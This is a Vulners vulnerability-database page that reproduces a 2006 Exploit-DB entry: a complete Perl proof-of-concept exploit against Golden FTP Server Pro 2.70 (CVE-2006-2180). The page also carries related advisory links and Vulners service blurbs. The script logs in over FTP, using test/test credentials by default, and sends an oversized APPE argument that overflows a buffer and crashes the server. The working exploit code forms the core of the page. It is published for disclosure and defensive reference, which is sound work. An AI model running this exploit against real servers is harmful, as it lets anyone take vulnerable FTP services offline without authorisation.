Lucene search
+L

Golden FTP Server Pro 2.70 - 'APPE' Remote Buffer Overflow (PoC)

🗓️ 03 May 2006 00:00:00Reported by Jerome AthiasType 
exploitdb
 exploitdb
🔗 www.exploit-db.com👁 63 Views

Golden FTP Server Pro 2.70 remote APPE command PoC exploit, denial of service (DoS) vulnerabilit

Related
Code
ReporterTitlePublishedViews
Family
Tenable Nessus
Golden FTP Server < 2.7.0 Multiple Vulnerabilities
1 Jul 200500:00
nessus
Tenable Nessus
Golden FTP Server Pro Multiple Command Remote Overflow DoS
4 May 200600:00
nessus
CVE
CVE-2006-2180
4 May 200610:00
cve
Cvelist
CVE-2006-2180
4 May 200610:00
cvelist
NVD
CVE-2006-2180
4 May 200612:38
nvd
Prion
Buffer overflow
4 May 200612:38
prion
#!/usr/bin/perl

#
-----------------------------------------------------------------------------------------
# Golden FTP Server Pro 2.70 Remote APPE command PoC exploit : DoS
# /JA
# https://www.securinfos.info
#
-----------------------------------------------------------------------------------------

use Net::FTP;

$host = @ARGV[0];
$port = @ARGV[1];
$debug = @ARGV[2];
$user = @ARGV[3];
$pass = @ARGV[4];

if (($host) && ($port)) {

# Exploit string (try with a different value if needed)
$exploit_string = "./A" x 1000;

      print "Trying to connect to $host:$port\n";
      $sock = Net::FTP->new("$host",Port => $port, TimeOut => 60, Debug=> $debug) or die "[-] Connection failed\n";
      print "[+] Connect OK!\n";
      print "Logging...\n";
      if (!$user) {
           $user = "test";
           $pass = "test";
      }
      $sock->login($user, $pass);
      sleep(1);
      $answer = $sock->message;
      print $answer ."\n";
      print "Sending string...\n";
      $sock->quot("APPE",$exploit_string);
} else {
      print "Golden FTP Server Pro 2.70 - Remote APPE command PoC
exploit : DoS\nhttps://www.securinfos.info\n\nUsing: $0 host port [debug: 1 or 0] username password\n\n";
}

# milw0rm.com [2006-05-03]

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

03 May 2006 00:00Current
5.8Medium risk
Vulners AI Score5.8
CVSS 26.4
EPSS0.0684
63